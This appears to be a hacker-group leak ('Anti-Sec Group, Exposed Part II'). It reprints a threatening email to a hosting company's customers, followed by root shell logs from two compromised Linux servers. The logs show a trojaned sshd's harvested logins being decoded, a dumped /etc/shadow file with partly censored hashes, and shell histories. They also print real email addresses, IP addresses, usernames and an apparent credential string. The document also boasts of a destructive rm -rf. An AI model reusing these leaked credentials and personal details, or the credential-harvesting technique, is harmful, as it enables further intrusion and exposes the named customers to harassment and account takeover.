Anti-Sec Group , Exposed Part II

1.  
2. _______ _______ .________
3. \ _ \ ___ __\ _ \ | ____/
4. / /_\ \\ \/ / /_\ \ |____ \
5. \ \_/ \> <\ \_/ \/ \
6. \_____ /__/\_ \\_____ /______ /
7. \/ \/ \/ \/
8. __ .__ __ .__
9. _____ _____ | | ______ __________ | | __ ___/ |_|__| ____ ____ ______
10. / \\__ \ | |/ / _ \/ ___/ _ \| | | | \ __\ |/ _ \ / \ / ___/
11. | Y Y \/ __ \| < <_> )___ ( <_> ) |_| | /| | | ( <_> ) | \\___ \
12. |__|_| (____ /__|_ \____/____ >____/|____/____/ |__| |__|\____/|___| /____ >
13. \/ \/ \/ \/ \/ \/
14. __________ _________
15. \______ \_______ ____ / _____/ ____ ____
16. ______ | ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
17. /_____/ | | | | \( <_> ) \ ___/\ \___
18. |____| |__| \____/_______ /\___ >\___ >
19. \/ \/ \/
20.  
21.  
22. Delivered-To: glafkos@gmail.com
23. Received: by 10.223.117.209 with SMTP id s17cs437044faq;
24. Thu, 2 Jul 2009 13:31:48 -0700 (PDT)
25. Received: by 10.224.67.129 with SMTP id r1mr663571qai.234.1246566706699;
26. Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
27. Return-Path: <glafk0s@hotmail.com>
28. Received: from blu0-omc4-s21.blu0.hotmail.com (blu0-omc4-s21.blu0.hotmail.com [65.55.111.160])
29. by mx.google.com with ESMTP id 2si5595246yxe.16.2009.07.02.13.31.45;
30. Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
31. Received-SPF: pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) client-ip=65.55.111.160;
32. Authentication-Results: mx.google.com; spf=pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) smtp.mail=glafk0s@hotmail.com
33. Received: from BLU123-W9 ([65.55.111.135]) by blu0-omc4-s21.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
34. Thu, 2 Jul 2009 13:31:22 -0700
35. Message-ID: <BLU123-W96370B1DA99ABE688265BEB2F0@phx.gbl>
36. Return-Path: glafk0s@hotmail.com
37. Content-Type: multipart/alternative;
38. boundary="_817cc510-a5cf-4a68-bec3-2a43760f95ae_"
39.  
40.  
41. X-Originating-IP: [188.51.85.13] // You still have a lot to learn :)
42.  
43.  
44. From: james knuth <glafk0s@hotmail.com>
45. To: <micronet@aol.com>, <mikespry.mdots@mdots.net>, <jstrat85@aol.com>,
46. <vlad@zealus.com>, <let995@yahoo.com>, <dejan@dwhost.net>,
47. <democreations@gmail.com>, <sales@hostforwebsite.com>,
48. <holeinthewallhosting@gmail.com>, <lucacri@gmail.com>, <k.ma@utoronto.ca>,
49. <dsecuya@gmail.com>, <peteslaughterbeck@yahoo.com>,
50. <michael.bastian@gmail.com>, <fletro@gmail.com>, <aalyazeedi@peo.gov.qa>,
51. <msprycha@makosolutions.com>, <glafkos@gmail.com>,
52. <horsepowerlounge@gmail.com>, <info@hostwebservice.com>,
53. <dave@bavariansolutions.com>, <keishaf18@yahoo.com>,
54. <adthorn@rochester.rr.com>, <mr22774556@live.com>, <vienna@consult.co.at>,
55. <bruno.matthys@gmail.com>
56. Subject: Makosolutions, LLC
57. Date: Thu, 2 Jul 2009 22:31:22 +0200
58. Importance: Normal
59. MIME-Version: 1.0
60. X-OriginalArrivalTime: 02 Jul 2009 20:31:22.0341 (UTC) FILETIME=[10245150:01C9FB54]
61.  
62. MakoSolutions, LLC // The remaining content of this email has been provided to the proper authorities
63. - Hacked.
64.  
65. I will keep this short and simple, you hosted someone I want down and I decided to take down your company
66. and publish your customers information for that.
67.  
68. // This is not your game anymore "Faisal Hourani". It seems that your anti-sec ideals were just excuses..
69.  
70.  
71. HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ
72.  
73. +----------------------------[ Owned ]----------------------------+
74. | Hack everyone you can and then hack some more |
75. | Owned[DC] v2 |
76. | _______ . _______ . _______ |
77. | Get in as anonymous, Leave with no trace. |
78. | |
79. +-----------------------------------------------------------------+
80. [ Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp i686 ]
81.  
82. 08:24:44 up 519 days, 11:20, 3 users, load average: 0.05, 0.10, 0.09
83. makos2 pts/1 61.17.231.6 Fri Jun 26 08:12 still logged in
84. makos2 pts/3 61.17.231.6 Fri Jun 26 04:10 - 04:25 (00:15)
85. makos2 pts/7 61.17.231.6 Fri Jun 26 04:09 - 04:09 (00:00)
86. makos2 pts/5 61.17.231.6 Fri Jun 26 03:58 - 04:09 (00:11)
87. makos2 pts/4 61.17.231.6 Fri Jun 26 03:54 still logged in
88.  
89. wtmp begins Tue Jun 2 01:09:06 2009
90. Owned[DC]:[~]# date
91. Fri Jun 26 08:26:44 EDT 2009
92. Owned[DC]:[~]# uname -a
93. Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp #1 SMP Wed Dec 19 16:01:12 EST 2007 i686 athlon i386 GNU/Linux
94. Owned[DC]:[~]#
95.  
96.  
97. Owned[DC]:[~]# cd /var/run/ssh
98. Owned[DC]:[/var/run]# gcc -o decode decode.c
99. Owned[DC]:[/var/run]# ./decode ssh.old
100. HOOKOUT: 67.225.142.98 root:_censored_
101. HOOKIN: root:_censored_
102. HOOKOUT: 66.96.220.213 root:_censored_
103. .
104. .
105. .
106. HOOKIN: makos2:_censored_
107. HOOKOUT: 64.191.116.202 root:_censored_
108.  
109. Owned[DC]:[/var/run]# w
110. 08:32:59 up 519 days, 11:28, 3 users, load average: 0.23, 0.22, 0.13
111. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
112. makos2 pts/0 61.17.231.6 03:53 3:54 0.13s 0.00s sshd: makos2 [priv]
113. makos2 pts/1 61.17.231.6 08:12 6.00s 0.06s 0.01s sshd: makos2 [priv]
114. makos2 pts/4 61.17.231.6 03:54 18:40 0.02s 0.01s sshd: makos2 [priv]
115. Owned[DC]:[/var/run]#
116.  
117. Owned[DC]:[/var/run]# cat /etc/shadow
118. root:_censored_:14418:0:99999:7:::
119. bin:*:13901:0:99999:7:::
120. daemon:*:13901:0:99999:7:::
121. adm:*:13901:0:99999:7:::
122. lp:*:13901:0:99999:7:::
123. sync:*:13901:0:99999:7:::
124. shutdown:*:13901:0:99999:7:::
125. halt:*:13901:0:99999:7:::
126. mail:*:13901:0:99999:7:::
127. news:*:13901:0:99999:7:::
128. uucp:*:13901:0:99999:7:::
129. operator:*:13901:0:99999:7:::
130. games:*:13901:0:99999:7:::
131. gopher:*:13901:0:99999:7:::
132. ftp:*:13901:0:99999:7:::
133. nobody:*:13901:0:99999:7:::
134. dbus:!!:13901:0:99999:7:::
135. vcsa:!!:13901:0:99999:7:::
136. rpm:!!:13901:0:99999:7:::
137. haldaemon:!!:13901:0:99999:7:::
138. netdump:!!:13901:0:99999:7:::
139. nscd:!!:13901:0:99999:7:::
140. sshd:!!:13901:0:99999:7:::
141. rpc:!!:13901:0:99999:7:::
142. mailnull:!!:13901:0:99999:7:::
143. smmsp:!!:13901:0:99999:7:::
144. pcap:!!:13901:0:99999:7:::
145. xfs:!!:13901:0:99999:7:::
146. pegasus:!!:13901:0:99999:7:::
147. mysql:!!:13901::::::
148. mailman:*:13901::::::
149. cpanel:*:13901::::::
150. systuser:!!:13901:0:99999:7:::
151. named:!!:13901::::::
152. clamav:!!:13901::::::
153. dorothy:_censored_:14126:0:99999:7:::
154. fileport:_censored_:13902:0:99999:7:::
155. icstune:_censored_:13902:0:99999:7:::
156. krisez:_censored_$LRTAc0.mSw4a72zaVSGJd0:13902:0:99999:7:::
157. kurwaun:_censored_$Y5V5WC30jDTB7h2HEuPWv0:13902:0:99999:7:::
158. makos:_censored_$6sPV/Yt2K90ah60vxrRE/.:14418:0:99999:7:::
159. makos2:_censored_$gUs1XceJmqOgEaHbeaQJN/:14418:0:99999:7:::
160. marcin:_censored_$CZjERtIuP0ob.TJhixQr5.:13902:0:99999:7:::
161. mdots:_censored_$JCyJyAL8iXQMeOQbF0jMo.:13902:0:99999:7:::
162. mklounge:_censored_$1Uw2zWBge5A2GLQqWS5Mn.:13902:0:99999:7:::
163. nashv:_censored_$h/475XUYdCfNl2N.mgPgV0:13902:0:99999:7:::
164. rogo:_censored_$6V878RKV1W/E4NPoGJHKu/:14192:0:99999:7:::
165. spanish:_censored_$h902kmWzyxUw1wwSMWWyp/:13902:0:99999:7:::
166. sprynet:_censored_$Zm2b8RGX0d8/qo5tSuJA3/:13902:0:99999:7:::
167. statewi:_censored_$EPK2zdk0Z9ET48XrRcsKJ1:14376:0:99999:7:::
168. tarocon:_censored_$6me2YVq3JQ0PeDFLV7Aml0:14073:0:99999:7:::
169. sprycha:_censored_$osQE8JvfI0lC/r464r1.30:13903:0:99999:7:::
170. hplounge:_censored_$59BBs5nOeFGPRO8hEj1F1.:13922:0:99999:7:::
171. cozy:_censored_$tj.rlOAmhdwJm6fdWPvv2.:13923:0:99999:7:::
172. cpanel-horde:*:13949::::::
173. cpanel-phpmyadmin:*:13949::::::
174. cpanel-phppgadmin:*:13949::::::
175. makospam:_censored_$9mTDWRT8N8NZ7hFUa.2Iv1:13962:0:99999:7:::
176. wiredbre:_censored_$jc6LduZz25ERlx0SSp6I8.:13980:0:99999:7:::
177. cybermun:_censored_$gSpGZJCyrf5eKoKXzoknb/:13984:0:99999:7:::
178. proto:_censored_$fuGMvBK.mAz7AO989Reqm/:14208:0:99999:7:::
179. tempecon:_censored_$M3wPHFn06YfnjqhpOoSis1:13995:0:99999:7:::
180. floralsi:_censored_$jboZSeeKKAecDPW7Xi8r01:13995:0:99999:7:::
181. serversh:_censored_$oh7hdFXLoQM7BtHaVIwDB0:13997:0:99999:7:::
182. simplify:_censored_$FRrjF78SYaCEyBK/zX9rU0:14025:0:99999:7:::
183. themunst:_censored_$YHtOc1ylvVbXQjSjCuMMS.:14017:0:99999:7:::
184. theregoe:_censored_$U1OUx/hznz7Z/cRxknMpV1:14019:0:99999:7:::
185. xbox360t:_censored_$52N4Y3wbF4I.j0xw0ybZv0:14027:0:99999:7:::
186. barbiedo:_censored_$dYASLs0QEHczZNK/xO4l60:14033:0:99999:7:::
187. c20q8anz:_censored_$5yj/Vw9bVQE1H8gFGnfwl0:14031:0:99999:7:::
188. bashingr:_censored_$40Rbu9u.CdR54/.QGx5hZ.:14034:0:99999:7:::
189. hawaiian:_censored_$YXD5Fqnc1wa47hXw5DS1z/:14036:0:99999:7:::
190. cnewyork:_censored_$auEIntz4K2naChQ6A8j42.:14035:0:99999:7:::
191. lasvegas:_censored_$O8g7FiIF7Z.G1BLakQhjl.:14035:0:99999:7:::
192. contourp:_censored_$Mhq3nTK4slo39beK7mAsV/:14036:0:99999:7:::
193. musiconl:_censored_$g.3Wk0K3xRAd8bzMfetZz0:14036:0:99999:7:::
194. jokesfor:_censored_$332BH8Z2tQ1.PoLUj0aeQ.:14036:0:99999:7:::
195. cpanelhorde:*:14037::::::
196. cpanelphpmyadmin:*:14037::::::
197. cpanelphppgadmin:*:14037::::::
198. cpanelroundcube:*:14037::::::
199. okcityco:_censored_$sRF34svAMlqkUvqPQyEXq/:14039:0:99999:7:::
200. pasadena:_censored_$IDwtddZgxQPTnlqIEiRd/.:14039:0:99999:7:::
201. ionsigns:_censored_$Vg7G3SaNWflS1zTsWy.b50:14292:0:99999:7:::
202. cherubim:_censored_$DIouDCIf0zrNJHJj1Hijy0:14042:0:99999:7:::
203. sanfranc:_censored_$G1VXarugAKLCe0mTh1mjz1:14042:0:99999:7:::
204. jillrace:_censored_$GWkRrIh91Slq3d4fP4Ysh/:14042:0:99999:7:::
205. portland:_censored_$9RiJMMNQaYXloc80zzyve/:14042:0:99999:7:::
206. newyorkc:_censored_$r/hkQYZAe3aMB2h72VDVE.:14042:0:99999:7:::
207. renoconc:_censored_$HreCJL6jaESpLR4GNQU2X0:14042:0:99999:7:::
208. indianap:_censored_$K69/LXuR2.0309THXC3IR1:14042:0:99999:7:::
209. lvconcer:_censored_$0SOI7NDDrTatWwv1qUtKw.:14042:0:99999:7:::
210. miamicon:_censored_$10LHNdaYHowHSELzvFlfW.:14042:0:99999:7:::
211. whatupla:_censored_$qBSgboCAfNT0K55szVNGv0:14322:0:99999:7:::
212. zconcert:_censored_$kj.cK7mz2sEam.1wusPIQ1:14042:0:99999:7:::
213. tokyocon:_censored_$bdBjHYHi4oSDqBsL/yHuS0:14042:0:99999:7:::
214. uhouston:_censored_$x/aaM4f.jxN1wMDYHnc/h.:14042:0:99999:7:::
215. raleigh:_censored_$tEFo7l/iuN.pRKxTSlCCe1:14042:0:99999:7:::
216. flagstaf:_censored_$mKfuTWqfxbt3X1ddt5fUK/:14042:0:99999:7:::
217. phoenixa:_censored_$5R9rVBeLzwZtIXTgSbfI9/:14042:0:99999:7:::
218. ap6mz0q2:_censored_$cfbHH6J9VN9UOr3KBZ9ts.:14042:0:99999:7:::
219. xq9s3ma:_censored_$vVfRtpDm4j1Uj08OcYmwG1:14044:0:99999:7:::
220. jacksonv:_censored_$yOc3XavkD3xVFrV/IyvKF.:14046:0:99999:7:::
221. exspry:_censored_$R/sFQOBW4EgGIThYQj28k.:14047:0:99999:7:::
222. exmako:_censored_$/YcknpKQlOCdzVzgWbJRM/:14048:0:99999:7:::
223. quagmire:_censored_$IrcWo57PYhw9lyNR8FlqR.:14049:0:99999:7:::
224. njmakos:_censored_$eLWUwH4sqaSjYNDDQD8uc.:14049:0:99999:7:::
225. vicscust:_censored_$zD1TjhIzUZXrqOlHSMKDv0:14220:0:99999:7:::
226. losangel:_censored_$ApXNU5tVAZvvTZ8wKhfrG0:14053:0:99999:7:::
227. newengla:_censored_$1inQwoEWSRR/mbuH/U8fj1:14053:0:99999:7:::
228. lvconven:_censored_$Pi1JPn.1OrKH5JaI5GjPf0:14055:0:99999:7:::
229. lvtrades:_censored_$dr.bC2FHXaV6QITM0lmbn1:14055:0:99999:7:::
230. nyctrade:_censored_$dAeNUEisO8nI1GxoDK7Bq0:14055:0:99999:7:::
231. services:_censored_$/MGwtjcf.Ru7o7y/HDd6P/:14068:0:99999:7:::
232. worships:_censored_$DD7lYOZiW2VfGQARqj4Nw/:14070:0:99999:7:::
233. eworship:_censored_$/RA2I.4drunr/Q5sEk/gA1:14070:0:99999:7:::
234. aemotors:_censored_$yHBjKMyrCFRYaGnSuAc420:14083:0:99999:7:::
235. workfrom:_censored_$8whIbBBBjYzZxgDDDuMde.:14091:0:99999:7:::
236. megaspel:_censored_$aO1t9Wneps4O6nDXFn.84/:14093:0:99999:7:::
237. espel:_censored_$PNoLG3/nFppUcjJB7Ndkc1:14093:0:99999:7:::
238. dyna:_censored_$oeAPTO2pNcYr7jguVfS.o0:14097:0:99999:7:::
239. niklas:_censored_$MLPe0p9S4Wz.ficqPiWE3.:14098:0:99999:7:::
240. glendale:_censored_$36WbIrHoaY6p.wQHDMKSI/:14112:0:99999:7:::
241. theworkf:_censored_$k9UTdl9Xszol3vXe8XJex/:14113:0:99999:7:::
242. missreso:_censored_$cMQPqmDGUCrI5GCTJ95IW1:14114:0:99999:7:::
243. theletro:_censored_$uSdV14r/ad2VSUSQN076J1:14137:0:99999:7:::
244. simobilg:_censored_$lgR0ZcRPsacgrXN0CyTph/:14163:0:99999:7:::
245. concert:_censored_$u78BVeFn/9dqijD5FxFn30:14167:0:99999:7:::
246. worldsbe:_censored_$KhYsNIhpV/9MpNLsJ7KkD1:14176:0:99999:7:::
247. x1qo0xmz:_censored_$35pb2Tt3NF7mcdwa8ij0S/:14210:0:99999:7:::
248. american:_censored_$f64FdDQZShu/QPCT01cig.:14212:0:99999:7:::
249. firstrat:_censored_$Cg447uD7Pf1PSfs03LyFI0:14217:0:99999:7:::
250. xq05vz73:_censored_$H96kS5lH6gbiK3ShSPwJG.:14219:0:99999:7:::
251. imsauto:_censored_$18x.Al7E/c8nKVG5w4ge90:14225:0:99999:7:::
252. headwayp:_censored_$5.CQnCYJzlFnw10dJB1fo/:14253:0:99999:7:::
253. performa:_censored_$RXFC0.Y9sd19TL59ulzBy0:14248:0:99999:7:::
254. snowboar:_censored_$S0pOHKtr37Qp283oBChtz0:14246:0:99999:7:::
255. importeu:_censored_$0vHEmwZW2WImMY8i961N7.:14260:0:99999:7:::
256. holyschn:_censored_$yyYCxFr6MAeXOFS4uGZxE1:14262:0:99999:7:::
257. rivercit:_censored_$JhMlSLJOJxGB84SdIX9VL0:14271:0:99999:7:::
258. perform:_censored_$MwABPul6js/dDkESj3NCa/:14334:0:99999:7:::
259. sco:_censored_$mD1J7V6/XgnGKexigg7ZQ/:14342:0:99999:7:::
260. austinar:_censored_$kwPledBlp5.5FRj7TCsXF.:14349:0:99999:7:::
261. arlingto:_censored_$HOPfqdVPLDjcKYOYXBssZ.:14350:0:99999:7:::
262. albuquer:_censored_$IIfpFNji/HFkgySU9QPyZ.:14350:0:99999:7:::
263. jvconcer:_censored_$Up603l0cXWF0BisBD010v/:14352:0:99999:7:::
264. sanjosec:_censored_$6lZMqhYCRgu07TQSTca1D.:14352:0:99999:7:::
265. sdconcer:_censored_$jsdhywYTV6.yqzfh7IApB1:14352:0:99999:7:::
266. bukemark:_censored_$giCqM37r16fagpVb.7SlB/:14363:0:99999:7:::
267. laconcer:_censored_$WBI4s4H3O7Slpsk7zrZpj.:14366:0:99999:7:::
268. dforce:_censored_$fjjNVrQw8LPQCDcgXRUkc1:14392:0:99999:7:::
269.  
270. Owned[DC]:[/backup]# cat ~/.bash_history
271. ssh 64.191.54.229 -l butts
272. #1244614734
273. ssh 64.191.54.229 -l butts
274. #1244651529
275. ssh butts@64.191.54.229
276. #1244644856
277. ssh 66.96.220.213 -l makosolutions
278. #1244644866
279. ssh 66.96.220.213 -l makosolutions -p 2222
280. #1244645088
281. ssh 66.96.220.213 -l mako -p 2222
282. #1244650823
283. top -c
284. #1244651468
285. ssh 66.96.220.213
286. #1244651606
287. ssh 66.96.220.213 -l makosolutions
288. #1244659374
289. ifconfig | grep 67.225.142.98
290. #1244659384
291. ssh -l butts server.holeinthewallhosting.com
292. #1244659474
293. nmap server.holeinthewallhosting.com
294. #1244659875
295. ssh -l butts server.holeinthewallhosting.com
296. #1244659891
297. ssh -l butts 64.191.54.229
298. #1244677757
299. ssh -l makosolutions 66.96.220.213
300. #1244810932
301. exit
302. #1244944507
303. ssh 64.191.54.229 -l butts
304. #1244971944
305. ssh -l butts 64.191.54.229
306. #1245004682
307. ssh 64.191.116.203
308. #1245013655
309. exit
310. #1245067142
311. ssh 66.96.220.213
312. #1245062070
313. ssh 66.96.220.213
314. #1245074394
315. ssh 64.191.116.203
316. #1245076716
317. exit
318. #1245058974
319. ssh 66.96.220.213
320. #1245082594
321. ssh 64.191.116.203
322. #1245141381
323. grep nukelar.reality-matrix.org /etc/trueuserdomains
324. #1245141388
325. grep nukelar.reality-matrix.org /etc/userdomains
326. #1245141593
327. ssh 64.191.116.203
328. #1245161918
329. ssh 66.96.220.213
330. #1245161939
331. telnet 66.96.220.213 22
332. #1245161953
333. telnet 66.96.220.213 53
334. #1245161969
335. nmap 66.96.220.213
336. #1245162042
337. ssh 66.96.220.213 -p 80
338. #1245147550
339. ssh 64.191.116.203
340. #1244659875
341. ssh -l butts server.holeinthewallhosting.com
342. #1244659891
343. ssh -l butts 64.191.54.229
344. #1244677757
345. ssh -l makosolutions 66.96.220.213 // infosec.org.uk
346. #1244810932
347. exit
348. #1244944507
349. ssh 64.191.54.229 -l butts
350. #1244971944
351. ssh -l butts 64.191.54.229
352. #1245004682
353. ssh 64.191.116.203
354. #1245013655
355. exit
356. #1245067142
357. ssh 66.96.220.213
358. #1245062070
359. ssh 66.96.220.213
360. #1245074394
361. ssh 64.191.116.203
362. #1245076716
363. exit
364. #1245058974
365. ssh 66.96.220.213
366. #1245082594
367. ssh 64.191.116.203
368. #1245141381
369. grep nukelar.reality-matrix.org /etc/trueuserdomains
370. #1245141388
371. grep nukelar.reality-matrix.org /etc/userdomains
372. #1245141593
373. ssh 64.191.116.203
374. #1245161918
375. ssh 66.96.220.213
376. #1245161939
377. telnet 66.96.220.213 22
378. #1245161953
379. telnet 66.96.220.213 53
380. #1245161969
381. nmap 66.96.220.213
382. #1245162042
383. ssh 66.96.220.213 -p 80
384. #1245147550
385. ssh 64.191.116.203
386. #1245184460
387. ssh 66.96.220.213
388. #1245199770
389. ssh -l makosolutions 66.96.220.213
390. #1245318670
391. vi /etc/csf/csf.denyip
392. #1245318687
393. ssh 66.96.220.213
394. #1245318707
395. ssh root@66.96.220.213
396. #1245318749
397. ssh mako@66.96.220.213 -p2222
398. #1245318770
399. ssh mako@66.96.220.213 -p 2222
400. #1245318842
401. ssh mako@66.96.220.213 -p2222
402. #1245316906
403. ssh 66.7.198.124
404. #1245317031
405. ssh 66.7.198.124
406. #1245317159
407. ssh 66.96.220.213
408. #1245318179
409. ssh 66.96.220.213
410. #1245319038
411. ssh 67.225.159.152
412. #1245319073
413. ssh 67.225.159.152 -p22
414. #1245319077
415. ssh 67.225.159.152 -p 22
416. .
417. .
418. .
419. csf -l | grep 66.96.211.181
420. #1245999632
421. apf
422. #1246000060
423. ssh 66.96.211.181 -l root
424. #1246000637
425. grep 66.96.211.181 /var/log/messages
426. #1246002631
427. cat /usr/local/psa/version
428. #1246002640
429. ls /usr/local/psa/version
430. #1246015247
431. ls /usr/local/psa/version
432. #1245998530
433. ssh 64.191.72.85
434. #1245998556
435. telnet 64.191.72.85 25
436. #1245998595
437. vzlist -a
438. #1246001328
439. ssh 64.191.72.85
440.  
441. Owned[DC]:[/backup]# df -h
442. Filesystem Size Used Avail Use% Mounted on
443. /dev/sda7 2.0G 426M 1.5G 23% /
444. /dev/sdb1 147G 61G 79G 44% /backup
445. /dev/sda1 1012M 46M 915M 5% /boot
446. none 2.0G 0 2.0G 0% /dev/shm
447. /dev/sda8 121G 32G 83G 28% /home
448. /dev/sda6 2.0G 37M 1.9G 2% /tmp
449. /dev/sda2 9.9G 5.6G 3.9G 60% /usr
450. /dev/sda5 9.9G 2.1G 7.3G 23% /var
451. /tmp 2.0G 37M 1.9G 2% /var/tmp
452. Owned[DC]:[/backup]#
453.  
454. Owned[DC]:[/etc/pam.d]# cat sshd
455. #%PAM-1.0
456. auth required pam_stack.so service=system-auth
457. auth required pam_nologin.so
458. account required pam_stack.so service=system-auth
459. password required pam_stack.so service=system-auth
460. session required pam_stack.so service=system-auth
461. session required pam_loginuid.so
462.  
463. auth required pam_shells.so
464.  
465. Owned[DC]:[/var/run]# hostname
466. puma.makosolutions.net
467. Owned[DC]:[/var/run]#
468.  
469. Owned[DC]:[~]# lsof -i TCP:22
470. COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
471. sshd 17433 root 3u IPv6 791605626 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
472. sshd 17441 makos2 3u IPv6 791605626 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
473. sshd 21409 root 3u IPv6 791273811 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
474. sshd 21412 makos2 3u IPv6 791273811 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
475. sshd 26799 root 3u IPv6 791290938 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
476. sshd 26806 makos2 3u IPv6 791290938 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
477. ssh 26887 root 3u IPv4 791291132 TCP puma.makosolutions.net:42625->serv.localhost:ssh (ESTABLISHED)
478. sshd 29596 root 3u IPv6 791533593 TCP puma.makosolutions.net:ssh->188.51.85.13:34957 (ESTABLISHED)
479. // RoMeO logged in just before the rm -rf / of makosolutions.com
480. sshd 30850 root 3u IPv6 783032196 TCP *:ssh (LISTEN)
481.  
482.  
483.  
484. _______ _______ ________
485. \ _ \ ___ __\ _ \ / _____/
486. / /_\ \\ \/ / /_\ \/ __ \
487. \ \_/ \> <\ \_/ \ |__\ \
488. \_____ /__/\_ \\_____ /\_____ /
489. \/ \/ \/ \/
490. .__ .__ .__ __ .__ .__ .__
491. | |__ ____ | | ____ |__| _____/ |_| |__ ______ _ _______ | | | |
492. | | \ / _ \| | _/ __ \| |/ \ __\ | \_/ __ \ \/ \/ /\__ \ | | | |
493. | Y ( <_> ) |_\ ___/| | | \ | | Y \ ___/\ / / __ \| |_| |__
494. |___| /\____/|____/\___ >__|___| /__| |___| /\___ >\/\_/ (____ /____/____/
495. \/ \/ \/ \/ \/ \/
496. .__ __ .__
497. | |__ ____ _______/ |_|__| ____ ____
498. | | \ / _ \/ ___/\ __\ |/ \ / ___\ ______
499. | Y ( <_> )___ \ | | | | | \/ /_/ > /_____/
500. |___| /\____/____ > |__| |__|___| /\___ /
501. \/ \/ \//_____/
502. __________ _________
503. \______ \_______ ____ / _____/ ____ ____
504. | ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
505. | | | | \( <_> ) \ ___/\ \___
506. |____| |__| \____/_______ /\___ >\___ >
507. \/ \/ \/
508.  
509.  
510. 64.191.54.229 0x3aownt:DlE46Y8KpH
511. +----------------------------[ Owned ]----------------------------+
512. | Hack everyone you can and then hack some more |
513. | Owned[DC] v2 |
514. | _______ . _______ . _______ |
515. | Get in as anonymous, Leave with no trace. |
516. | |
517. +-----------------------------------------------------------------+
518. [ Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 i686 ]
519.  
520. 11:12:13 up 78 days, 17:02, 0 users, load average: 1.73, 2.17, 2.23
521. mrich pts/0 75-28-177-133.li Thu Jun 25 22:40 - 22:47 (00:06)
522. jayzer pts/1 cpe-76-183-78-13 Thu Jun 25 00:45 - 00:49 (00:04)
523. fmystic pts/1 cpe-71-67-100-61 Wed Jun 24 23:27 - 00:14 (00:46)
524. butts pts/0 puma.makosolutio Wed Jun 24 21:47 - 02:54 (05:07)
525. bwc05 pts/1 host-136-245.flt Wed Jun 24 00:18 - 00:18 (00:00)
526.  
527. wtmp begins Wed Apr 29 04:10:02 2009
528. root@server [~]#
529.  
530.  
531. root@server [~]# lsof -i -n | grep ssh
532. sshd 13173 root 3u IPv6 496962909 TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
533. sshd 13176 hsp 3u IPv6 496962909 TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
534. sshd 13285 root 3u IPv6 496964091 TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
535. sshd 13287 stephenm 3u IPv6 496964091 TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
536. sshd 13287 stephenm 7u IPv4 505107114 TCP 64.191.54.229:53259->192.168.1.121:icslap (SYN_SENT)
537. sshd 13287 stephenm 8u IPv4 505106277 TCP 64.191.54.229:38749->192.121.86.4:http (SYN_SENT)
538. sshd 30096 root 3u IPv6 485663697 TCP *:ssh (LISTEN)
539. root@server [~]#
540.  
541.  
542. root@server [/var/run]# gcc -o decode decode.c
543. &#847;&#1030;&#693;root@server [/var/run]# ./decode ssh.old
544. HOOKIN: falados:$.lWKq._censored_
545. HOOKIN: smithah:_censored_
546. .
547. .
548. .
549. HOOKIN: karsh:vnm_censored_
550. HOOKIN: karsh:vnm_censored_
551. HOOKIN: smithah:Coverfir_censored_
552. HOOKIN: karsh:vn_censored_
553. HOOKIN: mrich:t23_censored_
554. root@server [/var/run]#
555.  
556. root@server [/var/run]# hostname
557. server.holeinthewallhosting.net
558. root@server [/var/run]# uname -a
559. Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 #1 SMP Tue Aug 5 07:41:53 EDT 2008 i686 i686 i386 GNU/Linux
560. root@server [/var/run]# date
561. Fri Jun 26 11:16:32 CDT 2009
562. root@server [/var/run]# ifconfig -a
563. eth0 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
564. inet addr:64.191.54.229 Bcast:64.191.54.239 Mask:255.255.255.240
565. inet6 addr: fe80::219:d1ff:fefb:459b/64 Scope:Link
566. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
567. RX packets:739777531 errors:0 dropped:0 overruns:0 frame:0
568. TX packets:970111216 errors:0 dropped:0 overruns:0 carrier:0
569. collisions:0 txqueuelen:1000
570. RX bytes:587506583 (560.2 MiB) TX bytes:4170982921 (3.8 GiB)
571. Interrupt:217 Base address:0x2000
572.  
573. eth0:1 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
574. inet addr:64.191.54.230 Bcast:64.191.54.255 Mask:255.255.255.0
575. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
576. Interrupt:217 Base address:0x2000
577.  
578. eth0:2 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
579. inet addr:64.191.54.231 Bcast:64.191.54.255 Mask:255.255.255.0
580. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
581. Interrupt:217 Base address:0x2000
582.  
583. eth0:3 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
584. inet addr:64.191.54.232 Bcast:64.191.54.255 Mask:255.255.255.0
585. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
586. Interrupt:217 Base address:0x2000
587.  
588. eth0:4 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
589. inet addr:64.191.54.233 Bcast:64.191.54.255 Mask:255.255.255.0
